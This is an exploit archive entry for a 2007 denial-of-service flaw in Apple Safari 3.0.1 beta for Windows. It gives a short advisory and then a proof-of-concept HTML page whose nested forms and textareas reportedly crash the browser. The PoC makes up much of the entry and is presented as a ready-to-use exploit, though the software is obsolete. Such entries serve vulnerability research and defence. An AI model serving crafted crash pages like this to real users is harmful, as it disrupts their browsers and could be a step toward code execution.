Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service

EDB-ID: 30193
Author: Lostmon
Type: dos
Platform: Windows
Date: 2007-06-16


source: https://www.securityfocus.com/bid/24497/info

Apple Safari for Windows is prone to a denial-of-service vulnerability because it fails to properly handle user-supplied input.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Attackers may also be able to execute arbitrary code, but Symantec had not confirmed this.

Safari 3.0.1 public beta for Windows is reported vulnerable.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation">&lt;/textarea&gt;
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation">&lt;/textarea&gt;
</form></form></body></html>